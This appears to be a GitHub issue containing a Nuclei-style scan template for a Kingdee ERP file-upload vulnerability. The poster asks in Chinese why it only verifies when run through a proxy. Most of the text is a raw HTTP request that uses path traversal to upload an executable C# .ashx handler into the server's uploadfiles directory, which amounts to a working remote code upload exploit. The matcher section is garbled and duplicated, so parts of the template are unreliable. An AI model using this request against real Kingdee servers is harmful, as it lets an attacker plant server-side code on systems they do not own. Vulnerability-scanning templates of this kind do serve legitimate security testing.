验证问题 #10
Description
挂上代理就可以扫出来 不挂就验证不出来是为什么呢
id: kindee-scpsupreghandler-fileupload
info:
name: kingdee-erp-file_upload
author: vitasoy
severity: critical
description: Kingdee ERP has a kingdee-erp-file_upload vulnerability.
tags: kingdee
http:
-
raw:
-
|
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Connection: close
Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061
Content-Length: 371--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="dbId_v".
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FID"2023
--2ac719f8e29343df94aa4ab49e456061
Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/rxfqaxnb.ashx."Content-Type: text/plain<%@ WebHandler Language="C#" Class="TestHandler" %>
using System;
using System.Web;
public class TestHandler : IHttpHandler {
public void ProcessRequest (HttpContext context) {
context.Response.ContentType= "text/plain";
context.Response.Write("vvqamowufznghchdvwleoqkylnuezaiq");
}
public bool IsReusable {
get {return false; }
}
}
--2ac719f8e29343df94aa4ab49e456061--
matchers:
- type: dsl
dsl:- 'contains(body,"附件保存成功")'
condition: or
- 'contains(body,"附件保存成功")'
-